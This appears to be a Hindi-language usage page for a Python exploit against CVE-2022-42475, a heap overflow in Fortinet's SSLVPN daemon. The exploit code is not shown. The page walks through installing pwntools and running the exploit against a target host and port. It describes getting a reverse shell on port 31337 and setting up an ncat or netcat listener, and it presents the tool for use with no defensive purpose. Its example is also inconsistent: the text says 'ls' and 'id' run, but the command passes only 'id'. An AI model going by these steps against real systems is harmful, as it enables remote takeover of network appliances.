
Fortinet SSLVPN डेमॉन में CVE-2022-42475 हीप ओवरफ्लो के लिए पायथन एक्सप्लॉइट। pwntools के माध्यम से रिवर्स शेल प्रदान करता है, जिसमें अनुकूलन योग्य लक्ष्य, पोर्ट और कमांड होते हैं।
Fortinet के SSLVPN डेमॉन में हीप ओवरफ़्लो का शोषण करने के लिए POC कोड
pip install pwntools इस कोड का उपयोग करने के लिए, आप इसे एक फ़ाइल में सहेज सकते हैं, जैसे exploit.py, और फिर इसे कमांड लाइन पर Python के साथ चला सकते हैं, आवश्यक तर्क पास करते हुए। यहाँ एक उदाहरण कमांड है जो एक्सप्लॉइट चलाने के लिए है:
python exploit.py <target_host> <target_port> <reverse_ip>
<target_host> को लक्ष्य सिस्टम के होस्टनाम या IP पते से बदलें, <target_port> को कमज़ोर सेवा के पोर्ट नंबर से, और <reverse_ip> को उस मशीन के IP पते से जिस पर आप शेल प्राप्त करना चाहते हैं। शेष तर्क वे कमांड हैं जिन्हें आप निष्पादित करना चाहते हैं, जो स्पेस से अलग होते हैं।
उदाहरण के लिए, यदि लक्ष्य सिस्टम का IP पता 192.168.0.100 है, कमज़ोर सेवा पोर्ट 8080 पर चल रही है, और आप ls और id कमांड निष्पादित करना चाहते हैं, तो आप निम्नलिखित कमांड चलाएँगे:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
यह 192.168.0.101:31337 पर एक रिवर्स शेल कनेक्शन बनाएगा और लक्ष्य सिस्टम पर ls और id कमांड निष्पादित करेगा। ध्यान दें कि रिवर्स शेल प्राप्त करने के लिए आपको निर्दिष्ट IP पते और पोर्ट पर एक लिसनर चालू रखना होगा। आप लिसनर बनाने के लिए ncat या netcat जैसे टूल का उपयोग कर सकते हैं।